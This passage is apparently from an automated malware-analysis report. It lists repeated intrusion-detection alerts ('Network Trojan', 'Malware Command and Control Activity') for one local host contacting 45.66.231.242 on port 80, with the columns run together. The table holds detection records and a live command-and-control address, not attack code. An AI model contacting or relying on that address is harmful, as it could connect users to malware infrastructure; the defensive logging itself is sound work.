            2024-10-01T10:56:47.572926+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449828TCP
            2024-10-01T10:56:48.479548+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449829TCP
            2024-10-01T10:56:49.343834+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449830TCP
            2024-10-01T10:56:50.158654+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449831TCP
            2024-10-01T10:56:50.989482+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449832TCP
            2024-10-01T10:56:51.885896+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449833TCP
            2024-10-01T10:56:52.789437+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449834TCP
            2024-10-01T10:56:53.777994+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449835TCP
            2024-10-01T10:56:54.603050+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449836TCP
            2024-10-01T10:56:55.414906+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449837TCP
            2024-10-01T10:56:56.211771+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449838TCP
            2024-10-01T10:56:57.145919+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449839TCP
            2024-10-01T10:56:57.976548+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449840TCP
            2024-10-01T10:56:58.809435+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449841TCP
            2024-10-01T10:57:00.079904+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449842TCP
            2024-10-01T10:57:01.018612+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449843TCP
            2024-10-01T10:57:01.965569+020020254831A Network Trojan was detected45.66.231.24280192.168.2.449844TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T10:55:01.753408+020020243131Malware Command and Control Activity Detected192.168.2.44973245.66.231.24280TCP
            2024-10-01T10:55:02.666163+020020243131Malware Command and Control Activity Detected192.168.2.44973345.66.231.24280TCP
            2024-10-01T10:55:03.554360+020020243131Malware Command and Control Activity Detected192.168.2.44973445.66.231.24280TCP
            2024-10-01T10:55:04.620841+020020243131Malware Command and Control Activity Detected192.168.2.44973545.66.231.24280TCP
            2024-10-01T10:55:05.540676+020020243131Malware Command and Control Activity Detected192.168.2.44973645.66.231.24280TCP
            2024-10-01T10:55:06.533521+020020243131Malware Command and Control Activity Detected192.168.2.44973745.66.231.24280TCP
            2024-10-01T10:55:10.377698+020020243131Malware Command and Control Activity Detected192.168.2.44973845.66.231.24280TCP
            2024-10-01T10:55:11.258339+020020243131Malware Command and Control Activity Detected192.168.2.44973945.66.231.24280TCP
            2024-10-01T10:55:12.104380+020020243131Malware Command and Control Activity Detected192.168.2.44974045.66.231.24280TCP
            2024-10-01T10:55:12.998782+020020243131Malware Command and Control Activity Detected192.168.2.44974145.66.231.24280TCP
            2024-10-01T10:55:13.904671+020020243131Malware Command and Control Activity Detected192.168.2.44974245.66.231.24280TCP
            2024-10-01T10:55:14.896174+020020243131Malware Command and Control Activity Detected192.168.2.44974445.66.231.24280TCP
            2024-10-01T10:55:15.839773+020020243131Malware Command and Control Activity Detected192.168.2.44974745.66.231.24280TCP
            2024-10-01T10:55:16.898883+020020243131Malware Command and Control Activity Detected192.168.2.44974945.66.231.24280TCP
            2024-10-01T10:55:20.761788+020020243131Malware Command and Control Activity Detected192.168.2.44975245.66.231.24280TCP
            2024-10-01T10:55:21.655036+020020243131Malware Command and Control Activity Detected192.168.2.44975345.66.231.24280TCP
            2024-10-01T10:55:22.549440+020020243131Malware Command and Control Activity Detected192.168.2.44975445.66.231.24280TCP
            2024-10-01T10:55:23.470660+020020243131Malware Command and Control Activity Detected192.168.2.44975545.66.231.24280TCP
            2024-10-01T10:55:24.552098+020020243131Malware Command and Control Activity Detected192.168.2.44975645.66.231.24280TCP
            2024-10-01T10:55:25.375102+020020243131Malware Command and Control Activity Detected192.168.2.44975745.66.231.24280TCP
            2024-10-01T10:55:26.195469+020020243131Malware Command and Control Activity Detected192.168.2.44975845.66.231.24280TCP
            2024-10-01T10:55:27.085668+020020243131Malware Command and Control Activity Detected192.168.2.44975945.66.231.24280TCP
            2024-10-01T10:55:27.951507+020020243131Malware Command and Control Activity Detected192.168.2.44976045.66.231.24280TCP
            2024-10-01T10:55:28.839624+020020243131Malware Command and Control Activity Detected192.168.2.44976145.66.231.24280TCP
            2024-10-01T10:55:29.661872+020020243131Malware Command and Control Activity Detected192.168.2.44976245.66.231.24280TCP
            2024-10-01T10:55:30.557844+020020243131Malware Command and Control Activity Detected192.168.2.44976345.66.231.24280TCP
            2024-10-01T10:55:31.394167+020020243131Malware Command and Control Activity Detected192.168.2.44976445.66.231.24280TCP
            2024-10-01T10:55:32.194135+020020243131Malware Command and Control Activity Detected192.168.2.44976545.66.231.24280TCP
            2024-10-01T10:55:33.025064+020020243131Malware Command and Control Activity Detected192.168.2.44976645.66.231.24280TCP
            2024-10-01T10:55:33.949352+020020243131Malware Command and Control Activity Detected192.168.2.44976745.66.231.24280TCP
            2024-10-01T10:55:34.773757+020020243131Malware Command and Control Activity Detected192.168.2.44976845.66.231.24280TCP
            2024-10-01T10:55:35.685085+020020243131Malware Command and Control Activity Detected192.168.2.44976945.66.231.24280TCP
            2024-10-01T10:55:36.536343+020020243131Malware Command and Control Activity Detected192.168.2.44977045.66.231.24280TCP
            2024-10-01T10:55:37.350895+020020243131Malware Command and Control Activity Detected192.168.2.44977145.66.231.24280TCP
            2024-10-01T10:55:38.216992+020020243131Malware Command and Control Activity Detected192.168.2.44977245.66.231.24280TCP
            2024-10-01T10:55:39.220320+020020243131Malware Command and Control Activity Detected192.168.2.44977345.66.231.24280TCP
            2024-10-01T10:55:40.152556+020020243131Malware Command and Control Activity Detected192.168.2.44977445.66.231.24280TCP
            2024-10-01T10:55:41.022138+020020243131Malware Command and Control Activity Detected192.168.2.44977545.66.231.24280TCP
            2024-10-01T10:55:42.240978+020020243131Malware Command and Control Activity Detected192.168.2.44977645.66.231.24280TCP
            2024-10-01T10:55:43.424782+020020243131Malware Command and Control Activity Detected192.168.2.44977745.66.231.24280TCP
            2024-10-01T10:55:47.272279+020020243131Malware Command and Control Activity Detected192.168.2.44977845.66.231.24280TCP
            2024-10-01T10:55:48.112864+020020243131Malware Command and Control Activity Detected192.168.2.44977945.66.231.24280TCP
            2024-10-01T10:55:48.953210+020020243131Malware Command and Control Activity Detected192.168.2.44978045.66.231.24280TCP
            2024-10-01T10:55:50.176120+020020243131Malware Command and Control Activity Detected192.168.2.44978145.66.231.24280TCP
            2024-10-01T10:55:50.990247+020020243131Malware Command and Control Activity Detected192.168.2.44978245.66.231.24280TCP
            2024-10-01T10:55:51.898024+020020243131Malware Command and Control Activity Detected192.168.2.44978345.66.231.24280TCP
            2024-10-01T10:55:53.034432+020020243131Malware Command and Control Activity Detected192.168.2.44978445.66.231.24280TCP
            2024-10-01T10:55:53.833889+020020243131Malware Command and Control Activity Detected192.168.2.44978645.66.231.24280TCP
            2024-10-01T10:55:54.639139+020020243131Malware Command and Control Activity Detected192.168.2.44978745.66.231.24280TCP
            2024-10-01T10:55:55.642415+020020243131Malware Command and Control Activity Detected192.168.2.44978845.66.231.24280TCP
            2024-10-01T10:55:56.438948+020020243131Malware Command and Control Activity Detected192.168.2.44978945.66.231.24280TCP
            2024-10-01T10:55:57.289043+020020243131Malware Command and Control Activity Detected192.168.2.44979045.66.231.24280TCP
            2024-10-01T10:55:58.586844+020020243131Malware Command and Control Activity Detected192.168.2.44979145.66.231.24280TCP
            2024-10-01T10:55:59.517374+020020243131Malware Command and Control Activity Detected192.168.2.44979245.66.231.24280TCP
            2024-10-01T10:56:00.358622+020020243131Malware Command and Control Activity Detected192.168.2.44979345.66.231.24280TCP
            2024-10-01T10:56:10.260937+020020243131Malware Command and Control Activity Detected192.168.2.44979445.66.231.24280TCP
            2024-10-01T10:56:11.179166+020020243131Malware Command and Control Activity Detected192.168.2.44979545.66.231.24280TCP
            2024-10-01T10:56:12.004600+020020243131Malware Command and Control Activity Detected192.168.2.44979645.66.231.24280TCP
            2024-10-01T10:56:12.873678+020020243131Malware Command and Control Activity Detected192.168.2.44979745.66.231.24280TCP
            2024-10-01T10:56:13.732989+020020243131Malware Command and Control Activity Detected192.168.2.44979845.66.231.24280TCP
            2024-10-01T10:56:14.662421+020020243131Malware Command and Control Activity Detected192.168.2.44979945.66.231.24280TCP
            2024-10-01T10:56:15.549540+020020243131Malware Command and Control Activity Detected192.168.2.44980045.66.231.24280TCP
            2024-10-01T10:56:16.583958+020020243131Malware Command and Control Activity Detected192.168.2.44980145.66.231.24280TCP
            2024-10-01T10:56:17.494274+020020243131Malware Command and Control Activity Detected192.168.2.44980245.66.231.24280TCP
            2024-10-01T10:56:21.570507+020020243131Malware Command and Control Activity Detected192.168.2.44980345.66.231.24280TCP
            2024-10-01T10:56:22.785811+020020243131Malware Command and Control Activity Detected192.168.2.44980445.66.231.24280TCP
            2024-10-01T10:56:23.757565+020020243131Malware Command and Control Activity Detected192.168.2.44980545.66.231.24280TCP
            2024-10-01T10:56:27.643202+020020243131Malware Command and Control Activity Detected192.168.2.44980645.66.231.24280TCP
            2024-10-01T10:56:28.562142+020020243131Malware Command and Control Activity Detected192.168.2.44980745.66.231.24280TCP
            2024-10-01T10:56:29.397053+020020243131Malware Command and Control Activity Detected192.168.2.44980845.66.231.24280TCP
            2024-10-01T10:56:30.238349+020020243131Malware Command and Control Activity Detected192.168.2.44980945.66.231.24280TCP
            2024-10-01T10:56:31.057616+020020243131Malware Command and Control Activity Detected192.168.2.44981045.66.231.24280TCP
            2024-10-01T10:56:32.074355+020020243131Malware Command and Control Activity Detected192.168.2.44981145.66.231.24280TCP
            2024-10-01T10:56:32.917597+020020243131Malware Command and Control Activity Detected192.168.2.44981245.66.231.24280TCP
            2024-10-01T10:56:33.794817+020020243131Malware Command and Control Activity Detected192.168.2.44981345.66.231.24280TCP
            2024-10-01T10:56:34.954399+020020243131Malware Command and Control Activity Detected192.168.2.44981445.66.231.24280TCP
            2024-10-01T10:56:35.847108+020020243131Malware Command and Control Activity Detected192.168.2.44981545.66.231.24280TCP
            2024-10-01T10:56:36.897917+020020243131Malware Command and Control Activity Detected192.168.2.44981645.66.231.24280TCP
            2024-10-01T10:56:37.827181+020020243131Malware Command and Control Activity Detected192.168.2.44981745.66.231.24280TCP
            2024-10-01T10:56:38.657817+020020243131Malware Command and Control Activity Detected192.168.2.44981845.66.231.24280TCP
            2024-10-01T10:56:39.503641+020020243131Malware Command and Control Activity Detected192.168.2.44981945.66.231.24280TCP
            2024-10-01T10:56:40.380881+020020243131Malware Command and Control Activity Detected192.168.2.44982045.66.231.24280TCP
            2024-10-01T10:56:41.310664+020020243131Malware Command and Control Activity Detected192.168.2.44982145.66.231.24280TCP
            2024-10-01T10:56:42.196431+020020243131Malware Command and Control Activity Detected192.168.2.44982245.66.231.24280TCP
            2024-10-01T10:56:43.188728+020020243131Malware Command and Control Activity Detected192.168.2.44982345.66.231.24280TCP
            2024-10-01T10:56:44.087856+020020243131Malware Command and Control Activity Detected192.168.2.44982445.66.231.24280TCP
            2024-10-01T10:56:44.963211+020020243131Malware Command and Control Activity Detected192.168.2.44982545.66.231.24280TCP
            2024-10-01T10:56:45.843694+020020243131Malware Command and Control Activity Detected192.168.2.44982645.66.231.24280TCP
            2024-10-01T10:56:46.767886+020020243131Malware Command and Control Activity Detected192.168.2.44982745.66.231.24280TCP
            2024-10-01T10:56:47.568144+020020243131Malware Command and Control Activity Detected192.168.2.44982845.66.231.24280TCP
            2024-10-01T10:56:48.474448+020020243131Malware Command and Control Activity Detected192.168.2.44982945.66.231.24280TCP
            2024-10-01T10:56:49.332110+020020243131Malware Command and Control Activity Detected192.168.2.44983045.66.231.24280TCP
            2024-10-01T10:56:50.153802+020020243131Malware Command and Control Activity Detected192.168.2.44983145.66.231.24280TCP
            2024-10-01T10:56:50.984561+020020243131Malware Command and Control Activity Detected192.168.2.44983245.66.231.24280TCP
            2024-10-01T10:56:51.881052+020020243131Malware Command and Control Activity Detected192.168.2.44983345.66.231.24280TCP
            2024-10-01T10:56:52.776756+020020243131Malware Command and Control Activity Detected192.168.2.44983445.66.231.24280TCP
            2024-10-01T10:56:53.773058+020020243131Malware Command and Control Activity Detected192.168.2.44983545.66.231.24280TCP
            2024-10-01T10:56:54.594825+020020243131Malware Command and Control Activity Detected192.168.2.44983645.66.231.24280TCP
            2024-10-01T10:56:55.410095+020020243131Malware Command and Control Activity Detected192.168.2.44983745.66.231.24280TCP
            2024-10-01T10:56:56.206844+020020243131Malware Command and Control Activity Detected192.168.2.44983845.66.231.24280TCP
            2024-10-01T10:56:57.141032+020020243131Malware Command and Control Activity Detected192.168.2.44983945.66.231.24280TCP
            2024-10-01T10:56:57.970989+020020243131Malware Command and Control Activity Detected192.168.2.44984045.66.231.24280TCP
            2024-10-01T10:56:58.804022+020020243131Malware Command and Control Activity Detected192.168.2.44984145.66.231.24280TCP
            2024-10-01T10:57:00.074828+020020243131Malware Command and Control Activity Detected192.168.2.44984245.66.231.24280TCP
            2024-10-01T10:57:01.013791+020020243131Malware Command and Control Activity Detected192.168.2.44984345.66.231.24280TCP
            2024-10-01T10:57:01.960683+020020243131Malware Command and Control Activity Detected192.168.2.44984445.66.231.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T10:55:01.753408+020020243181Malware Command and Control Activity Detected192.168.2.44973245.66.231.24280TCP
            2024-10-01T10:55:02.666163+020020243181Malware Command and Control Activity Detected192.168.2.44973345.66.231.24280TCP
            2024-10-01T10:55:03.554360+020020243181Malware Command and Control Activity Detected192.168.2.44973445.66.231.24280TCP
            2024-10-01T10:55:04.620841+020020243181Malware Command and Control Activity Detected192.168.2.44973545.66.231.24280TCP
            2024-10-01T10:55:05.540676+020020243181Malware Command and Control Activity Detected192.168.2.44973645.66.231.24280TCP
            2024-10-01T10:55:06.533521+020020243181Malware Command and Control Activity Detected192.168.2.44973745.66.231.24280TCP
            2024-10-01T10:55:10.377698+020020243181Malware Command and Control Activity Detected192.168.2.44973845.66.231.24280TCP
            2024-10-01T10:55:11.258339+020020243181Malware Command and Control Activity Detected192.168.2.44973945.66.231.24280TCP
            2024-10-01T10:55:12.104380+020020243181Malware Command and Control Activity Detected192.168.2.44974045.66.231.24280TCP
            2024-10-01T10:55:12.998782+020020243181Malware Command and Control Activity Detected192.168.2.44974145.66.231.24280TCP
            2024-10-01T10:55:13.904671+020020243181Malware Command and Control Activity Detected192.168.2.44974245.66.231.24280TCP
            2024-10-01T10:55:14.896174+020020243181Malware Command and Control Activity Detected192.168.2.44974445.66.231.24280TCP
            2024-10-01T10:55:15.839773+020020243181Malware Command and Control Activity Detected192.168.2.44974745.66.231.24280TCP
            2024-10-01T10:55:16.898883+020020243181Malware Command and Control Activity Detected192.168.2.44974945.66.231.24280TCP
            2024-10-01T10:55:20.761788+020020243181Malware Command and Control Activity Detected192.168.2.44975245.66.231.24280TCP
            2024-10-01T10:55:21.655036+020020243181Malware Command and Control Activity Detected192.168.2.44975345.66.231.24280TCP
            2024-10-01T10:55:22.549440+020020243181Malware Command and Control Activity Detected192.168.2.44975445.66.231.24280TCP
            2024-10-01T10:55:23.470660+020020243181Malware Command and Control Activity Detected192.168.2.44975545.66.231.24280TCP
            2024-10-01T10:55:24.552098+020020243181Malware Command and Control Activity Detected192.168.2.44975645.66.231.24280TCP
            2024-10-01T10:55:25.375102+020020243181Malware Command and Control Activity Detected192.168.2.44975745.66.231.24280TCP
            2024-10-01T10:55:26.195469+020020243181Malware Command and Control Activity Detected192.168.2.44975845.66.231.24280TCP
            2024-10-01T10:55:27.085668+020020243181Malware Command and Control Activity Detected192.168.2.44975945.66.231.24280TCP
            2024-10-01T10:55:27.951507+020020243181Malware Command and Control Activity Detected192.168.2.44976045.66.231.24280TCP
            2024-10-01T10:55:28.839624+020020243181Malware Command and Control Activity Detected192.168.2.44976145.66.231.24280TCP
            2024-10-01T10:55:29.661872+020020243181Malware Command and Control Activity Detected192.168.2.44976245.66.231.24280TCP
            2024-10-01T10:55:30.557844+020020243181Malware Command and Control Activity Detected192.168.2.44976345.66.231.24280TCP
            2024-10-01T10:55:31.394167+020020243181Malware Command and Control Activity Detected192.168.2.44976445.66.231.24280TCP
            2024-10-01T10:55:32.194135+020020243181Malware Command and Control Activity Detected192.168.2.44976545.66.231.24280TCP
            2024-10-01T10:55:33.025064+020020243181Malware Command and Control Activity Detected192.168.2.44976645.66.231.24280TCP
            2024-10-01T10:55:33.949352+020020243181Malware Command and Control Activity Detected192.168.2.44976745.66.231.24280TCP
            2024-10-01T10:55:34.773757+020020243181Malware Command and Control Activity Detected192.168.2.44976845.66.231.24280TCP
            2024-10-01T10:55:35.685085+020020243181Malware Command and Control Activity Detected192.168.2.44976945.66.231.24280TCP
            2024-10-01T10:55:36.536343+020020243181Malware Command and Control Activity Detected192.168.2.44977045.66.231.24280TCP
            2024-10-01T10:55:37.350895+020020243181Malware Command and Control Activity Detected192.168.2.44977145.66.231.24280TCP
            2024-10-01T10:55:38.216992+020020243181Malware Command and Control Activity Detected192.168.2.44977245.66.231.24280TCP
            2024-10-01T10:55:39.220320+020020243181Malware Command and Control Activity Detected192.168.2.44977345.66.231.24280TCP
            2024-10-01T10:55:40.152556+020020243181Malware Command and Control Activity Detected192.168.2.44977445.66.231.24280TCP
            2024-10-01T10:55:41.022138+020020243181Malware Command and Control Activity Detected192.168.2.44977545.66.231.24280TCP
            2024-10-01T10:55:42.240978+020020243181Malware Command and Control Activity Detected192.168.2.44977645.66.231.24280TCP
            2024-10-01T10:55:43.424782+020020243181Malware Command and Control Activity Detected192.168.2.44977745.66.231.24280TCP
            2024-10-01T10:55:47.272279+020020243181Malware Command and Control Activity Detected192.168.2.44977845.66.231.24280TCP
            2024-10-01T10:55:48.112864+020020243181Malware Command and Control Activity Detected192.168.2.44977945.66.231.24280TCP
            2024-10-01T10:55:48.953210+020020243181Malware Command and Control Activity Detected192.168.2.44978045.66.231.24280TCP
            2024-10-01T10:55:50.176120+020020243181Malware Command and Control Activity Detected192.168.2.44978145.66.231.24280TCP
            2024-10-01T10:55:50.990247+020020243181Malware Command and Control Activity Detected192.168.2.44978245.66.231.24280TCP
            2024-10-01T10:55:51.898024+020020243181Malware Command and Control Activity Detected192.168.2.44978345.66.231.24280TCP
            2024-10-01T10:55:53.034432+020020243181Malware Command and Control Activity Detected192.168.2.44978445.66.231.24280TCP
            2024-10-01T10:55:53.833889+020020243181Malware Command and Control Activity Detected192.168.2.44978645.66.231.24280TCP
            2024-10-01T10:55:54.639139+020020243181Malware Command and Control Activity Detected192.168.2.44978745.66.231.24280TCP
            2024-10-01T10:55:55.642415+020020243181Malware Command and Control Activity Detected192.168.2.44978845.66.231.24280TCP
            2024-10-01T10:55:56.438948+020020243181Malware Command and Control Activity Detected192.168.2.44978945.66.231.24280TCP
            2024-10-01T10:55:57.289043+020020243181Malware Command and Control Activity Detected192.168.2.44979045.66.231.24280TCP
            2024-10-01T10:55:58.586844+020020243181Malware Command and Control Activity Detected192.168.2.44979145.66.231.24280TCP
            2024-10-01T10:55:59.517374+020020243181Malware Command and Control Activity Detected192.168.2.44979245.66.231.24280TCP
            2024-10-01T10:56:00.358622+020020243181Malware Command and Control Activity Detected192.168.2.44979345.66.231.24280TCP
            2024-10-01T10:56:10.260937+020020243181Malware Command and Control Activity Detected192.168.2.44979445.66.231.24280TCP
            2024-10-01T10:56:11.179166+020020243181Malware Command and Control Activity Detected192.168.2.44979545.66.231.24280TCP
            2024-10-01T10:56:12.004600+020020243181Malware Command and Control Activity Detected192.168.2.44979645.66.231.24280TCP
            2024-10-01T10:56:12.873678+020020243181Malware Command and Control Activity Detected192.168.2.44979745.66.231.24280TCP
            2024-10-01T10:56:13.732989+020020243181Malware Command and Control Activity Detected192.168.2.44979845.66.231.24280TCP
            2024-10-01T10:56:14.662421+020020243181Malware Command and Control Activity Detected192.168.2.44979945.66.231.24280TCP
            2024-10-01T10:56:15.549540+020020243181Malware Command and Control Activity Detected192.168.2.44980045.66.231.24280TCP
            2024-10-01T10:56:16.583958+020020243181Malware Command and Control Activity Detected192.168.2.44980145.66.231.24280TCP
            2024-10-01T10:56:17.494274+020020243181Malware Command and Control Activity Detected192.168.2.44980245.66.231.24280TCP
            2024-10-01T10:56:21.570507+020020243181Malware Command and Control Activity Detected192.168.2.44980345.66.231.24280TCP
            2024-10-01T10:56:22.785811+020020243181Malware Command and Control Activity Detected192.168.2.44980445.66.231.24280TCP
            2024-10-01T10:56:23.757565+020020243181Malware Command and Control Activity Detected192.168.2.44980545.66.231.24280TCP
            2024-10-01T10:56:27.643202+020020243181Malware Command and Control Activity Detected192.168.2.44980645.66.231.24280TCP
            2024-10-01T10:56:28.562142+020020243181Malware Command and Control Activity Detected192.168.2.44980745.66.231.24280TCP
            2024-10-01T10:56:29.397053+020020243181Malware Command and Control Activity Detected192.168.2.44980845.66.231.24280TCP
            2024-10-01T10:56:30.238349+020020243181Malware Command and Control Activity Detected192.168.2.44980945.66.231.24280TCP
            2024-10-01T10:56:31.057616+020020243181Malware Command and Control Activity Detected192.168.2.44981045.66.231.24280TCP
            2024-10-01T10:56:32.074355+020020243181Malware Command and Control Activity Detected192.168.2.44981145.66.231.24280TCP
            2024-10-01T10:56:32.917597+020020243181Malware Command and Control Activity Detected192.168.2.44981245.66.231.24280TCP
            2024-10-01T10:56:33.794817+020020243181Malware Command and Control Activity Detected192.168.2.44981345.66.231.24280TCP
            2024-10-01T10:56:34.954399+020020243181Malware Command and Control Activity Detected192.168.2.44981445.66.231.24280TCP
            2024-10-01T10:56:35.847108+020020243181Malware Command and Control Activity Detected192.168.2.44981545.66.231.24280TCP
            2024-10-01T10:56:36.897917+020020243181Malware Command and Control Activity Detected192.168.2.44981645.66.231.24280TCP
            2024-10-01T10:56:37.827181+020020243181Malware Command and Control Activity Detected192.168.2.44981745.66.231.24280TCP
            2024-10-01T10:56:38.657817+020020243181Malware Command and Control Activity Detected192.168.2.44981845.66.231.24280TCP
            2024-10-01T10:56:39.503641+020020243181Malware Command and Control Activity Detected192.168.2.44981945.66.231.24280TCP
            2024-10-01T10:56:40.380881+020020243181Malware Command and Control Activity Detected192.168.2.44982045.66.231.24280TCP
            2024-10-01T10:56:41.310664+020020243181Malware Command and Control Activity Detected192.168.2.44982145.66.231.24280TCP
            2024-10-01T10:56:42.196431+020020243181Malware Command and Control Activity Detected192.168.2.44982245.66.231.24280TCP
            2024-10-01T10:56:43.188728+020020243181Malware Command and Control Activity Detected192.168.2.44982345.66.231.24280TCP
            2024-10-01T10:56:44.087856+020020243181Malware Command and Control Activity Detected192.168.2.44982445.66.231.24280TCP
            2024-10-01T10:56:44.963211+020020243181Malware Command and Control Activity Detected192.168.2.44982545.66.231.24280TCP
            2024-10-01T10:56:45.843694+020020243181Malware Command and Control Activity Detected192.168.2.44982645.66.231.24280TCP
            2024-10-01T10:56:46.767886+020020243181Malware Command and Control Activity Detected192.168.2.44982745.66.231.24280TCP
            2024-10-01T10:56:47.568144+020020243181Malware Command and Control Activity Detected192.168.2.44982845.66.231.24280TCP
            2024-10-01T10:56:48.474448+020020243181Malware Command and Control Activity Detected192.168.2.44982945.66.231.24280TCP
            2024-10-01T10:56:49.332110+020020243181Malware Command and Control Activity Detected192.168.2.44983045.66.231.24280TCP
            2024-10-01T10:56:50.153802+020020243181Malware Command and Control Activity Detected192.168.2.44983145.66.231.24280TCP
            2024-10-01T10:56:50.984561+020020243181Malware Command and Control Activity Detected192.168.2.44983245.66.231.24280TCP
            2024-10-01T10:56:51.881052+020020243181Malware Command and Control Activity Detected192.168.2.44983345.66.231.24280TCP
            2024-10-01T10:56:52.776756+020020243181Malware Command and Control Activity Detected192.168.2.44983445.66.231.24280TCP
            2024-10-01T10:56:53.773058+020020243181Malware Command and Control Activity Detected192.168.2.44983545.66.231.24280TCP
            2024-10-01T10:56:54.594825+020020243181Malware Command and Control Activity Detected192.168.2.44983645.66.231.24280TCP
            2024-10-01T10:56:55.410095+020020243181Malware Command and Control Activity Detected192.168.2.44983745.66.231.24280TCP
            2024-10-01T10:56:56.206844+020020243181Malware Command and Control Activity Detected192.168.2.44983845.66.231.24280TCP
            2024-10-01T10:56:57.141032+020020243181Malware Command and Control Activity Detected192.168.2.44983945.66.231.24280TCP
            2024-10-01T10:56:57.970989+020020243181Malware Command and Control Activity Detected192.168.2.44984045.66.231.24280TCP
            2024-10-01T10:56:58.804022+020020243181Malware Command and Control Activity Detected192.168.2.44984145.66.231.24280TCP
            2024-10-01T10:57:00.074828+020020243181Malware Command and Control Activity Detected192.168.2.44984245.66.231.24280TCP
            2024-10-01T10:57:01.013791+020020243181Malware Command and Control Activity Detected192.168.2.44984345.66.231.24280TCP
            2024-10-01T10:57:01.960683+020020243181Malware Command and Control Activity Detected192.168.2.44984445.66.231.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T10:54:59.017244+020020216411A Network Trojan was detected192.168.2.44973045.66.231.24280TCP
            2024-10-01T10:55:00.012405+020020216411A Network Trojan was detected192.168.2.44973145.66.231.24280TCP
            2024-10-01T10:55:01.012878+020020216411A Network Trojan was detected192.168.2.44973245.66.231.24280TCP
            2024-10-01T10:55:01.929584+020020216411A Network Trojan was detected192.168.2.44973345.66.231.24280TCP
            2024-10-01T10:55:02.838931+020020216411A Network Trojan was detected192.168.2.44973445.66.231.24280TCP
            2024-10-01T10:55:03.734897+020020216411A Network Trojan was detected192.168.2.44973545.66.231.24280TCP
            2024-10-01T10:55:04.791909+020020216411A Network Trojan was detected192.168.2.44973645.66.231.24280TCP
            2024-10-01T10:55:05.714856+020020216411A Network Trojan was detected192.168.2.44973745.66.231.24280TCP
            2024-10-01T10:55:06.689995+020020216411A Network Trojan was detected192.168.2.44973845.66.231.24280TCP
            2024-10-01T10:55:10.539446+020020216411A Network Trojan was detected192.168.2.44973945.66.231.24280TCP
            2024-10-01T10:55:11.431407+020020216411A Network Trojan was detected192.168.2.44974045.66.231.24280TCP
            2024-10-01T10:55:12.290926+020020216411A Network Trojan was detected192.168.2.44974145.66.231.24280TCP
            2024-10-01T10:55:13.156783+020020216411A Network Trojan was detected192.168.2.44974245.66.231.24280TCP
            2024-10-01T10:55:14.059014+020020216411A Network Trojan was detected192.168.2.44974445.66.231.24280TCP
            2024-10-01T10:55:15.181877+020020216411A Network Trojan was detected192.168.2.44974745.66.231.24280TCP
            2024-10-01T10:55:16.001641+020020216411A Network Trojan was detected192.168.2.44974945.66.231.24280TCP
            2024-10-01T10:55:17.057243+020020216411A Network Trojan was detected192.168.2.44975245.66.231.24280TCP
            2024-10-01T10:55:20.935914+020020216411A Network Trojan was detected192.168.2.44975345.66.231.24280TCP
            2024-10-01T10:55:21.808725+020020216411A Network Trojan was detected192.168.2.44975445.66.231.24280TCP
            2024-10-01T10:55:22.700322+020020216411A Network Trojan was detected192.168.2.44975545.66.231.24280TCP
            2024-10-01T10:55:23.622010+020020216411A Network Trojan was detected192.168.2.44975645.66.231.24280TCP
            2024-10-01T10:55:24.716379+020020216411A Network Trojan was detected192.168.2.44975745.66.231.24280TCP
            2024-10-01T10:55:25.534367+020020216411A Network Trojan was detected192.168.2.44975845.66.231.24280TCP
            2024-10-01T10:55:26.361457+020020216411A Network Trojan was detected192.168.2.44975945.66.231.24280TCP
            2024-10-01T10:55:27.260785+020020216411A Network Trojan was detected192.168.2.44976045.66.231.24280TCP
            2024-10-01T10:55:28.111446+020020216411A Network Trojan was detected192.168.2.44976145.66.231.24280TCP
            2024-10-01T10:55:28.997001+020020216411A Network Trojan was detected192.168.2.44976245.66.231.24280TCP
            2024-10-01T10:55:29.807741+020020216411A Network Trojan was detected192.168.2.44976345.66.231.24280TCP
            2024-10-01T10:55:30.730772+020020216411A Network Trojan was detected192.168.2.44976445.66.231.24280TCP
            2024-10-01T10:55:31.541452+020020216411A Network Trojan was detected192.168.2.44976545.66.231.24280TCP
            2024-10-01T10:55:32.344919+020020216411A Network Trojan was detected192.168.2.44976645.66.231.24280TCP
            2024-10-01T10:55:33.286078+020020216411A Network Trojan was detected192.168.2.44976745.66.231.24280TCP
            2024-10-01T10:55:34.118881+020020216411A Network Trojan was detected192.168.2.44976845.66.231.24280TCP
            2024-10-01T10:55:34.933166+020020216411A Network Trojan was detected192.168.2.44976945.66.231.24280TCP
            2024-10-01T10:55:35.839128+020020216411A Network Trojan was detected192.168.2.44977045.66.231.24280TCP
            2024-10-01T10:55:36.706651+020020216411A Network Trojan was detected192.168.2.44977145.66.231.24280TCP
            2024-10-01T10:55:37.524416+020020216411A Network Trojan was detected192.168.2.44977245.66.231.24280TCP
            2024-10-01T10:55:38.374178+020020216411A Network Trojan was detected192.168.2.44977345.66.231.24280TCP
            2024-10-01T10:55:39.385441+020020216411A Network Trojan was detected192.168.2.44977445.66.231.24280TCP
            2024-10-01T10:55:40.328121+020020216411A Network Trojan was detected192.168.2.44977545.66.231.24280TCP
            2024-10-01T10:55:41.381303+020020216411A Network Trojan was detected192.168.2.44977645.66.231.24280TCP
            2024-10-01T10:55:42.421721+020020216411A Network Trojan was detected192.168.2.44977745.66.231.24280TCP
            2024-10-01T10:55:43.589678+020020216411A Network Trojan was detected192.168.2.44977845.66.231.24280TCP
            2024-10-01T10:55:47.464644+020020216411A Network Trojan was detected192.168.2.44977945.66.231.24280TCP
            2024-10-01T10:55:48.292929+020020216411A Network Trojan was detected192.168.2.44978045.66.231.24280TCP
            2024-10-01T10:55:49.348506+020020216411A Network Trojan was detected192.168.2.44978145.66.231.24280TCP
